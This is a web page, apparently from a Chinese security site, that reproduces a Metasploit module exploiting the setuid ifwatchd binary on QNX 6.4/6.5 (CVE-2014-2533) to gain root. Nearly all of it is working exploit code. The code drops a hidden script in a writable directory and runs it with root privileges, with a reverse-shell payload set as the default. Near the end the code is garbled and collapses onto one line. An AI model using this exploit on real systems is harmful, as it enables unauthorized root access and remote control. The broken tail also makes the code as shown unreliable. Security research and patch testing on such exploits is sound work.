首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ifwatchd Privilege Escalation
来源:metasploit.com 作者:Coles 发布时间:2018-10-09  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ifwatchd Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
        systems by exploiting the ifwatchd suid executable.

        ifwatchd allows users to specify scripts to execute using the '-A'
        command line argument; however, it does not drop privileges when
        executing user-supplied scripts, resulting in execution of arbitrary
        commands as root.

        This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
        and 6.5.0 SP1 (x86).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'cenobyte',     # Discovery and exploit
          'Tim Brown',    # Independent discovery
          'Brendan Coles' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2014-2533'],
          ['BID', '66449'],
          ['EDB', '32153'],
          ['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
        ],
      'DisclosureDate' => 'Mar 10 2014',
      'Platform'       => 'unix', # QNX
      'Arch'           => ARCH_CMD,
      'SessionTypes'   => %w(shell meterpreter),
      'Targets'        => [['Automatic', {}]],
      'Privileged'     => true,
      'Payload'        =>
        {
          'BadChars'    => '',
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'gawk generic'
            }
        },
      'DefaultOptions' =>
        {
          'WfsDelay' => 10,
          'PAYLOAD'  => 'cmd/unix/reverse_awk'
        }
    ))
    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def ifwatchd_path
    '/sbin/ifwatchd'
  end

  def base_dir
    datastore['WritableDir']
  end

  def check
    unless setuid? ifwatchd_path
      vprint_error "#{ifwatchd_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{ifwatchd_path} is setuid"

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"

    print_status 'Writing interface arrival event script...'
    cmd_exec "echo '#!/bin/sh' > #{script_path}"
    cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
    cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
    exp = payload.encoded.gsub('"', '\"').gsub('
, '\ ) cmd_exec "echo \"#{exp}\" >> #{script_path}" cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}" register_file_for_cleanup script_path cmd_exec "chmod +x '#{script_path}'" print_status "Executing #{ifwatchd_path}..." interface = 'lo0' cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo " end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Linux - Kernel Pointer Leak vi
·Delta Electronics Delta Indust
·Cisco Prime Infrastructure - U
·Linux Kernel < 4.11.8 - 'mq_no
·net-snmp 5.7.3 - Unauthenticat
·Imperva SecureSphere 13 - Remo
·360 3.5.0.1033 - Sandbox Escap
·FLIR Thermal Traffic Cameras 1
·Unitrends UEB HTTP API Remote
·Zahir Enterprise Plus 6 Stack
·Navigate CMS Unauthenticated R
·Windows Net-NTLMv2 Reflection
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved